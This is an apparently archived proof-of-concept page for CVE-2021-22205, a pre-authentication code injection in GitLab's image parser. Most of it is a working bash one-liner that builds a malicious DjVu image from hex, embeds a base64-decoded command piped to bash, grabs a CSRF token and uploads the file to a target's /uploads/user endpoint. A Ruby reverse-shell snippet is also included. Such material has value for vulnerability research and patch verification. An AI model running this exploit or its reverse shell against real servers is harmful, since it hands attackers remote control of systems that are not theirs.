PoC details: 1fee3fb432c3df3b0fb479a76c3a3b340067006b

Source
Related vulnerability
Title: GitLab code injection vulnerability (CVE-2021-22205)
Description: GitLab is an open-source, end-to-end software development platform from the US company GitLab, with built-in version control, issue tracking, code review, CI/CD (continuous integration and continuous delivery) and other features. GitLab Community Edition contains a code injection vulnerability caused by incorrect input validation in the image parser when it processes image files. The following products and versions are affected: GitLab Community Edition: 11.9.0, 11.9.1, 11.9.2, 11.9.3, 11.9.4, 11.9.5, 11.9.6, 11.9.7, 11.9.8, 11.9.9, 11
Description
PoC in a single line of bash
Introduction
# GitLab-preauth-RCE_CVE-2021-22205

Single-line bash PoC for the GitLab pre-auth RCE (CVE-2021-22205)

```bash
t="http://vuln.site";cmd='echo xxx_base64_of_reverse_shell_code_xxx |base64 -d|bash';f="1.jpg";echo 41542654464f524d000003af444a564d4449524d0000002e81000200000046000000acffffdebf992021c8914eeb0c071fd2da88e86be6440f2c7102ee49d36e95bda2c3223f464f524d0000005e444a5655494e464f0000000a00080008180064001600494e434c0000000f7368617265645f616e6e6f2e696666004247343400000011004a0102000800088ae6e1b137d97f2a89004247343400000004010ff99f4247343400000002020a464f524d00000307444a5649414e546100000150286d657461646174610a0928436f7079726967687420225c0a22202e2071787b|xxd -p -r>$f;echo -n $cmd>>$f;echo 7d202e205c0a222062202229202920202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020|xxd -p -r>>$f;curl -b c -c c -XPOST $t/uploads/user -H "X-CSRF-Token: $(curl -b c -c c -s "$t/users/sign_in" |grep -Po '(?<=csrf-token" content=")([^"]*)')" -F "file=@$f"
```

Code for the reverse shell:
```bash
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("127.0.0.1",8080);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```

Reference:

https://hackerone.com/reports/1154542
File snapshot

```
[4.0K] /data/pocs/1fee3fb432c3df3b0fb479a76c3a3b340067006b
└── [1.9K] README.md

0 directories, 1 file
```